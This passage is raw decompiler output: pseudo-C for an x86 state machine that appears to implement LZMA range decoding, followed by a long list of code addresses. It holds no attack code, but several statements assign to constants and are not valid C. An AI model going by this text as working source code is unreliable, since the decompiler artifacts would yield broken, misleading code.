								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406e06
0x00406e06
0x00406e0a
0x00406ec1
0x00406ec4
0x00406ed0
0x00406db1
0x00406db1
0x00406db4
0x00407126
0x00407126
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x00000000
0x00407177
0x00407177
0x0040717b
0x0040732a
0x00000000
0x0040732a
0x00407187
0x0040718e
0x00407196
0x00407199
0x00000000
0x00407199
0x00406e10
0x00406e14
0x00407355
0x00407355
0x00407358
0x0040735c
0x0040735c
0x00406e1a
0x00406e20
0x00406e23
0x00406e27
0x00406e2a
0x00406e2e
0x004072f4
0x00407340
0x00407348
0x0040734f
0x00407351
0x00000000
0x00407351
0x00406e34
0x00406e37
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00406e68
0x00406e68
0x00406e68
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00000000
0x00406b47
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00000000
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00000000
0x00406e92
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00000000
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00000000
0x00407123
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
